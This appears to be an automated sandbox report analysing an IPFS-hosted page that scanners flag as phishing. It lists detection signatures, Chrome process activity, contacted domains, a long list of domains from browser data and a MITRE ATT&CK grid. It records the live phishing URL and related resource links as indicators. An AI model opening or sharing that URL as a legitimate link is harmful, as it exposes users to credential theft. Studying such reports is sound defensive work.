Edit tour

Windows Analysis Report
http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre

Overview

General Information

Sample URL:	http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre
Analysis ID:	1592352
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Uses IPFS gateway to access IPFS content in browser (often used in phishing/scams)

Creates files inside the system directory

Deletes files inside the Windows folder

Detected non-DNS traffic on DNS port

HTML body contains low number of good links

HTML body contains password input but no form action

HTML page contains hidden javascript code

HTML title does not match URL

Classification

Process Tree

System is w10x64

chrome.exe (PID: 5804 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 3180 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1988,i,17994503529284284409,1155299332949706755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

chrome.exe (PID: 6528 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)

cleanup

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 16 Jan 2025 00:33:00 GMTContent-Length: 4288Content-Security-Policy: object-src 'none'; base-uri 'self'; default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'X-Frame-Options: SAMEORIGINVary: Accept-EncodingContent-Language: enX-Content-Type-Options: nosniffReferrer-Policy: strict-origin-when-cross-originCache-Control: public, max-age=31536000X-XSS-Protection: 1; mode=blockPermissions-Policy: fullscreen=(self)Connection: closeContent-Type: text/html; charset=utf-8

Source: sets.json.0.dr	String found in binary or memory: https://07c225f3.online
Source: sets.json.0.dr	String found in binary or memory: https://24.hu
Source: sets.json.0.dr	String found in binary or memory: https://aajtak.in
Source: sets.json.0.dr	String found in binary or memory: https://abczdrowie.pl
Source: sets.json.0.dr	String found in binary or memory: https://alice.tw
Source: chromecache_58.2.dr	String found in binary or memory: https://alphatrade-options.com/git/rand/favicon.png
Source: sets.json.0.dr	String found in binary or memory: https://ambitionbox.com
Source: sets.json.0.dr	String found in binary or memory: https://autobild.de
Source: sets.json.0.dr	String found in binary or memory: https://baomoi.com
Source: sets.json.0.dr	String found in binary or memory: https://bild.de
Source: sets.json.0.dr	String found in binary or memory: https://blackrock.com
Source: sets.json.0.dr	String found in binary or memory: https://blackrockadvisorelite.it
Source: sets.json.0.dr	String found in binary or memory: https://bluradio.com
Source: sets.json.0.dr	String found in binary or memory: https://bolasport.com
Source: sets.json.0.dr	String found in binary or memory: https://bonvivir.com
Source: sets.json.0.dr	String found in binary or memory: https://bumbox.com
Source: sets.json.0.dr	String found in binary or memory: https://businessinsider.com.pl
Source: sets.json.0.dr	String found in binary or memory: https://businesstoday.in
Source: sets.json.0.dr	String found in binary or memory: https://cachematrix.com
Source: sets.json.0.dr	String found in binary or memory: https://cafemedia.com
Source: sets.json.0.dr	String found in binary or memory: https://caracoltv.com
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.be
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.com
Source: sets.json.0.dr	String found in binary or memory: https://carcostadvisor.fr
Source: sets.json.0.dr	String found in binary or memory: https://cardsayings.net
Source: sets.json.0.dr	String found in binary or memory: https://chatbot.com
Source: sets.json.0.dr	String found in binary or memory: https://chennien.com
Source: sets.json.0.dr	String found in binary or memory: https://citybibleforum.org
Source: sets.json.0.dr	String found in binary or memory: https://clarosports.com
Source: sets.json.0.dr	String found in binary or memory: https://clmbtech.com
Source: sets.json.0.dr	String found in binary or memory: https://closeronline.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://clubelpais.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://cmxd.com.mx
Source: chromecache_58.2.dr	String found in binary or memory: https://code.jquery.com/jquery-2.2.4.min.js
Source: sets.json.0.dr	String found in binary or memory: https://cognitive-ai.ru
Source: sets.json.0.dr	String found in binary or memory: https://cognitiveai.ru
Source: sets.json.0.dr	String found in binary or memory: https://commentcamarche.com
Source: sets.json.0.dr	String found in binary or memory: https://commentcamarche.net
Source: sets.json.0.dr	String found in binary or memory: https://computerbild.de
Source: sets.json.0.dr	String found in binary or memory: https://content-loader.com
Source: sets.json.0.dr	String found in binary or memory: https://cookreactor.com
Source: sets.json.0.dr	String found in binary or memory: https://cricbuzz.com
Source: sets.json.0.dr	String found in binary or memory: https://css-load.com
Source: sets.json.0.dr	String found in binary or memory: https://deccoria.pl
Source: sets.json.0.dr	String found in binary or memory: https://deere.com
Source: sets.json.0.dr	String found in binary or memory: https://desimartini.com
Source: sets.json.0.dr	String found in binary or memory: https://dewarmsteweek.be
Source: sets.json.0.dr	String found in binary or memory: https://drimer.io
Source: sets.json.0.dr	String found in binary or memory: https://drimer.travel
Source: sets.json.0.dr	String found in binary or memory: https://economictimes.com
Source: sets.json.0.dr	String found in binary or memory: https://een.be
Source: sets.json.0.dr	String found in binary or memory: https://efront.com
Source: sets.json.0.dr	String found in binary or memory: https://eleconomista.net
Source: sets.json.0.dr	String found in binary or memory: https://elfinancierocr.com
Source: sets.json.0.dr	String found in binary or memory: https://elgrafico.com
Source: sets.json.0.dr	String found in binary or memory: https://ella.sv
Source: sets.json.0.dr	String found in binary or memory: https://elpais.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://elpais.uy
Source: sets.json.0.dr	String found in binary or memory: https://etfacademy.it
Source: sets.json.0.dr	String found in binary or memory: https://eworkbookcloud.com
Source: sets.json.0.dr	String found in binary or memory: https://eworkbookrequest.com
Source: chromecache_58.2.dr	String found in binary or memory: https://fac.corp.fortinet.com/customviews/image/password_hidden:93edf7d3ceb704be92ee084ecc62c6c8/
Source: sets.json.0.dr	String found in binary or memory: https://fakt.pl
Source: sets.json.0.dr	String found in binary or memory: https://finn.no
Source: chromecache_58.2.dr	String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/portal-aa363.appspot.com/o/favicons.png?alt=media&token=
Source: sets.json.0.dr	String found in binary or memory: https://firstlook.biz
Source: sets.json.0.dr	String found in binary or memory: https://gallito.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://geforcenow.com
Source: sets.json.0.dr	String found in binary or memory: https://gettalkdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://gliadomain.com
Source: sets.json.0.dr	String found in binary or memory: https://gnttv.com
Source: sets.json.0.dr	String found in binary or memory: https://graziadaily.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://grid.id
Source: sets.json.0.dr	String found in binary or memory: https://gridgames.app
Source: sets.json.0.dr	String found in binary or memory: https://growthrx.in
Source: sets.json.0.dr	String found in binary or memory: https://grupolpg.sv
Source: sets.json.0.dr	String found in binary or memory: https://gujaratijagran.com
Source: sets.json.0.dr	String found in binary or memory: https://hapara.com
Source: sets.json.0.dr	String found in binary or memory: https://hazipatika.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1.global
Source: sets.json.0.dr	String found in binary or memory: https://hc1cas.com
Source: sets.json.0.dr	String found in binary or memory: https://hc1cas.global
Source: sets.json.0.dr	String found in binary or memory: https://healthshots.com
Source: sets.json.0.dr	String found in binary or memory: https://hearty.app
Source: sets.json.0.dr	String found in binary or memory: https://hearty.gift
Source: sets.json.0.dr	String found in binary or memory: https://hearty.me
Source: sets.json.0.dr	String found in binary or memory: https://heartymail.com
Source: sets.json.0.dr	String found in binary or memory: https://heatworld.com
Source: sets.json.0.dr	String found in binary or memory: https://helpdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://hindustantimes.com
Source: sets.json.0.dr	String found in binary or memory: https://hj.rs
Source: sets.json.0.dr	String found in binary or memory: https://hjck.com
Source: sets.json.0.dr	String found in binary or memory: https://html-load.cc
Source: sets.json.0.dr	String found in binary or memory: https://html-load.com
Source: sets.json.0.dr	String found in binary or memory: https://human-talk.org
Source: sets.json.0.dr	String found in binary or memory: https://idbs-cloud.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-dev.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-eworkbook.com
Source: sets.json.0.dr	String found in binary or memory: https://idbs-staging.com
Source: chromecache_58.2.dr	String found in binary or memory: https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif
Source: sets.json.0.dr	String found in binary or memory: https://img-load.com
Source: sets.json.0.dr	String found in binary or memory: https://indiatimes.com
Source: sets.json.0.dr	String found in binary or memory: https://indiatoday.in
Source: sets.json.0.dr	String found in binary or memory: https://indiatodayne.in
Source: sets.json.0.dr	String found in binary or memory: https://infoedgeindia.com
Source: sets.json.0.dr	String found in binary or memory: https://interia.pl
Source: sets.json.0.dr	String found in binary or memory: https://intoday.in
Source: sets.json.0.dr	String found in binary or memory: https://iolam.it
Source: sets.json.0.dr	String found in binary or memory: https://ishares.com
Source: sets.json.0.dr	String found in binary or memory: https://jagran.com
Source: sets.json.0.dr	String found in binary or memory: https://johndeere.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldesfemmes.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldesfemmes.fr
Source: sets.json.0.dr	String found in binary or memory: https://journaldunet.com
Source: sets.json.0.dr	String found in binary or memory: https://journaldunet.fr
Source: sets.json.0.dr	String found in binary or memory: https://joyreactor.cc
Source: sets.json.0.dr	String found in binary or memory: https://joyreactor.com
Source: sets.json.0.dr	String found in binary or memory: https://kaksya.in
Source: sets.json.0.dr	String found in binary or memory: https://knowledgebase.com
Source: sets.json.0.dr	String found in binary or memory: https://kompas.com
Source: sets.json.0.dr	String found in binary or memory: https://kompas.tv
Source: sets.json.0.dr	String found in binary or memory: https://kompasiana.com
Source: sets.json.0.dr	String found in binary or memory: https://lanacion.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://landyrev.com
Source: sets.json.0.dr	String found in binary or memory: https://landyrev.ru
Source: sets.json.0.dr	String found in binary or memory: https://laprensagrafica.com
Source: sets.json.0.dr	String found in binary or memory: https://lateja.cr
Source: sets.json.0.dr	String found in binary or memory: https://libero.it
Source: sets.json.0.dr	String found in binary or memory: https://linternaute.com
Source: sets.json.0.dr	String found in binary or memory: https://linternaute.fr
Source: sets.json.0.dr	String found in binary or memory: https://livechat.com
Source: sets.json.0.dr	String found in binary or memory: https://livechatinc.com
Source: sets.json.0.dr	String found in binary or memory: https://livehindustan.com
Source: sets.json.0.dr	String found in binary or memory: https://livemint.com
Source: sets.json.0.dr	String found in binary or memory: https://max.auto
Source: sets.json.0.dr	String found in binary or memory: https://medonet.pl
Source: sets.json.0.dr	String found in binary or memory: https://meo.pt
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.co.cr
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.bo
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.do
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ec
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.gt
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.hn
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ni
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.pa
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.pe
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.py
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.sv
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://mercadolibre.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://mercadolivre.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadolivre.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ec
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.pe
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://mercadopago.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.cl
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.ar
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.br
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.co
Source: sets.json.0.dr	String found in binary or memory: https://mercadoshops.com.mx
Source: sets.json.0.dr	String found in binary or memory: https://mighty-app.appspot.com
Source: sets.json.0.dr	String found in binary or memory: https://mightytext.net
Source: sets.json.0.dr	String found in binary or memory: https://mittanbud.no
Source: sets.json.0.dr	String found in binary or memory: https://money.pl
Source: sets.json.0.dr	String found in binary or memory: https://motherandbaby.com
Source: sets.json.0.dr	String found in binary or memory: https://mystudentdashboard.com
Source: sets.json.0.dr	String found in binary or memory: https://nacion.com
Source: sets.json.0.dr	String found in binary or memory: https://naukri.com
Source: sets.json.0.dr	String found in binary or memory: https://nidhiacademyonline.com
Source: sets.json.0.dr	String found in binary or memory: https://nien.co
Source: sets.json.0.dr	String found in binary or memory: https://nien.com
Source: sets.json.0.dr	String found in binary or memory: https://nien.org
Source: sets.json.0.dr	String found in binary or memory: https://nlc.hu
Source: sets.json.0.dr	String found in binary or memory: https://nosalty.hu
Source: sets.json.0.dr	String found in binary or memory: https://noticiascaracol.com
Source: sets.json.0.dr	String found in binary or memory: https://nourishingpursuits.com
Source: sets.json.0.dr	String found in binary or memory: https://nvidia.com
Source: sets.json.0.dr	String found in binary or memory: https://o2.pl
Source: sets.json.0.dr	String found in binary or memory: https://ocdn.eu
Source: sets.json.0.dr	String found in binary or memory: https://onet.pl
Source: sets.json.0.dr	String found in binary or memory: https://ottplay.com
Source: sets.json.0.dr	String found in binary or memory: https://p106.net
Source: sets.json.0.dr	String found in binary or memory: https://p24.hu
Source: sets.json.0.dr	String found in binary or memory: https://paula.com.uy
Source: sets.json.0.dr	String found in binary or memory: https://pdmp-apis.no
Source: sets.json.0.dr	String found in binary or memory: https://phonandroid.com
Source: sets.json.0.dr	String found in binary or memory: https://player.pl
Source: sets.json.0.dr	String found in binary or memory: https://plejada.pl
Source: sets.json.0.dr	String found in binary or memory: https://poalim.site
Source: sets.json.0.dr	String found in binary or memory: https://poalim.xyz
Source: sets.json.0.dr	String found in binary or memory: https://pomponik.pl
Source: sets.json.0.dr	String found in binary or memory: https://portalinmobiliario.com
Source: sets.json.0.dr	String found in binary or memory: https://prisjakt.no
Source: sets.json.0.dr	String found in binary or memory: https://pudelek.pl
Source: sets.json.0.dr	String found in binary or memory: https://punjabijagran.com
Source: sets.json.0.dr	String found in binary or memory: https://radio1.be
Source: sets.json.0.dr	String found in binary or memory: https://radio2.be
Source: sets.json.0.dr	String found in binary or memory: https://reactor.cc
Source: sets.json.0.dr	String found in binary or memory: https://repid.org
Source: sets.json.0.dr	String found in binary or memory: https://reshim.org
Source: sets.json.0.dr	String found in binary or memory: https://rws1nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://rws2nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://rws3nvtvt.com
Source: sets.json.0.dr	String found in binary or memory: https://sackrace.ai
Source: sets.json.0.dr	String found in binary or memory: https://salemoveadvisor.com
Source: sets.json.0.dr	String found in binary or memory: https://salemovefinancial.com
Source: sets.json.0.dr	String found in binary or memory: https://salemovetravel.com
Source: sets.json.0.dr	String found in binary or memory: https://samayam.com
Source: sets.json.0.dr	String found in binary or memory: https://sapo.io
Source: sets.json.0.dr	String found in binary or memory: https://sapo.pt
Source: sets.json.0.dr	String found in binary or memory: https://shock.co
Source: sets.json.0.dr	String found in binary or memory: https://smaker.pl
Source: sets.json.0.dr	String found in binary or memory: https://smoney.vn
Source: sets.json.0.dr	String found in binary or memory: https://smpn106jkt.sch.id
Source: sets.json.0.dr	String found in binary or memory: https://socket-to-me.vip
Source: sets.json.0.dr	String found in binary or memory: https://songshare.com
Source: sets.json.0.dr	String found in binary or memory: https://songstats.com
Source: sets.json.0.dr	String found in binary or memory: https://sporza.be
Source: sets.json.0.dr	String found in binary or memory: https://standardsandpraiserepurpose.com
Source: sets.json.0.dr	String found in binary or memory: https://startlap.hu
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.com
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.net
Source: sets.json.0.dr	String found in binary or memory: https://startupislandtaiwan.org
Source: sets.json.0.dr	String found in binary or memory: https://stripe.com
Source: sets.json.0.dr	String found in binary or memory: https://stripe.network
Source: sets.json.0.dr	String found in binary or memory: https://stripecdn.com
Source: sets.json.0.dr	String found in binary or memory: https://supereva.it
Source: sets.json.0.dr	String found in binary or memory: https://takeabreak.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://talkdeskqaid.com
Source: sets.json.0.dr	String found in binary or memory: https://talkdeskstgid.com
Source: sets.json.0.dr	String found in binary or memory: https://teacherdashboard.com
Source: sets.json.0.dr	String found in binary or memory: https://technology-revealed.com
Source: sets.json.0.dr	String found in binary or memory: https://terazgotuje.pl
Source: sets.json.0.dr	String found in binary or memory: https://text.com
Source: sets.json.0.dr	String found in binary or memory: https://textyserver.appspot.com
Source: sets.json.0.dr	String found in binary or memory: https://the42.ie
Source: sets.json.0.dr	String found in binary or memory: https://thejournal.ie
Source: sets.json.0.dr	String found in binary or memory: https://thirdspace.org.au
Source: sets.json.0.dr	String found in binary or memory: https://timesinternet.in
Source: sets.json.0.dr	String found in binary or memory: https://timesofindia.com
Source: sets.json.0.dr	String found in binary or memory: https://tolteck.app
Source: sets.json.0.dr	String found in binary or memory: https://tolteck.com
Source: sets.json.0.dr	String found in binary or memory: https://top.pl
Source: sets.json.0.dr	String found in binary or memory: https://tribunnews.com
Source: sets.json.0.dr	String found in binary or memory: https://trytalkdesk.com
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com.co
Source: sets.json.0.dr	String found in binary or memory: https://tucarro.com.ve
Source: sets.json.0.dr	String found in binary or memory: https://tvid.in
Source: sets.json.0.dr	String found in binary or memory: https://tvn.pl
Source: sets.json.0.dr	String found in binary or memory: https://tvn24.pl
Source: sets.json.0.dr	String found in binary or memory: https://unotv.com
Source: sets.json.0.dr	String found in binary or memory: https://victorymedium.com
Source: sets.json.0.dr	String found in binary or memory: https://vrt.be
Source: sets.json.0.dr	String found in binary or memory: https://vwo.com
Source: sets.json.0.dr	String found in binary or memory: https://welt.de
Source: sets.json.0.dr	String found in binary or memory: https://wieistmeineip.de
Source: sets.json.0.dr	String found in binary or memory: https://wildix.com
Source: sets.json.0.dr	String found in binary or memory: https://wildixin.com
Source: sets.json.0.dr	String found in binary or memory: https://wingify.com
Source: sets.json.0.dr	String found in binary or memory: https://wordle.at
Source: sets.json.0.dr	String found in binary or memory: https://wp.pl
Source: sets.json.0.dr	String found in binary or memory: https://wpext.pl
Source: sets.json.0.dr	String found in binary or memory: https://www.asadcdn.com
Source: sets.json.0.dr	String found in binary or memory: https://ya.ru
Source: sets.json.0.dr	String found in binary or memory: https://yours.co.uk
Source: sets.json.0.dr	String found in binary or memory: https://zalo.me
Source: sets.json.0.dr	String found in binary or memory: https://zdrowietvn.pl
Source: sets.json.0.dr	String found in binary or memory: https://zingmp3.vn
Source: sets.json.0.dr	String found in binary or memory: https://zoom.com
Source: sets.json.0.dr	String found in binary or memory: https://zoom.us

Source: unknown	Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50407
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50407 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5804_1536413053\manifest.fingerprint	Jump to behavior

Source: C:\Program Files\Google\Chrome\Application\chrome.exe

File deleted: C:\Windows\SystemTemp\chrome_BITS_5804_1200003111

Jump to behavior

Source: classification engine

Classification label: mal52.phis.win@19/15@19/10

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1988,i,17994503529284284409,1155299332949706755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 --field-trial-handle=1988,i,17994503529284284409,1155299332949706755,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	1 Drive-by Compromise	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	3 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 File Deletion	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
http://ipfs.io/ipfs/bafkreievtwi7zrnlawdlg7643acb3jrsmhymub6ofunocklc7jsmefuyre	100%	Avira URL Cloud	phishing

Source	Detection	Scanner	Label	Link
https://alphatrade-options.com/git/rand/favicon.png	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
code.jquery.com	151.101.194.137	true	false	high
www.google.com	142.250.185.100	true	false	high
fac.corp.fortinet.com	208.91.114.103	true	false	high
d28h3jm4r3crf8.cloudfront.net	65.9.66.107	true	false	unknown
ipfs.io	209.94.90.1	true	false	high
alphatrade-options.com	unknown	unknown	false	high
ik.imagekit.io	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://code.jquery.com/jquery-2.2.4.min.js	false		high
https://ik.imagekit.io/escrowmade/Rolling-1s-200px__1__trHCWXy9jD.gif	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wieistmeineip.de	sets.json.0.dr	false		high
https://mercadoshops.com.co	sets.json.0.dr	false		high
https://gliadomain.com	sets.json.0.dr	false		high
https://poalim.xyz	sets.json.0.dr	false		high
https://mercadolivre.com	sets.json.0.dr	false		high
https://reshim.org	sets.json.0.dr	false		high
https://nourishingpursuits.com	sets.json.0.dr	false		high
https://medonet.pl	sets.json.0.dr	false		high
https://unotv.com	sets.json.0.dr	false		high
https://mercadoshops.com.br	sets.json.0.dr	false		high
https://joyreactor.cc	sets.json.0.dr	false		high
https://zdrowietvn.pl	sets.json.0.dr	false		high
https://johndeere.com	sets.json.0.dr	false		high
https://songstats.com	sets.json.0.dr	false		high
https://baomoi.com	sets.json.0.dr	false		high
https://supereva.it	sets.json.0.dr	false		high
https://elfinancierocr.com	sets.json.0.dr	false		high
https://bolasport.com	sets.json.0.dr	false		high
https://rws1nvtvt.com	sets.json.0.dr	false		high
https://alphatrade-options.com/git/rand/favicon.png	chromecache_58.2.dr	false	Avira URL Cloud: safe	unknown
https://desimartini.com	sets.json.0.dr	false		high
https://hearty.app	sets.json.0.dr	false		high
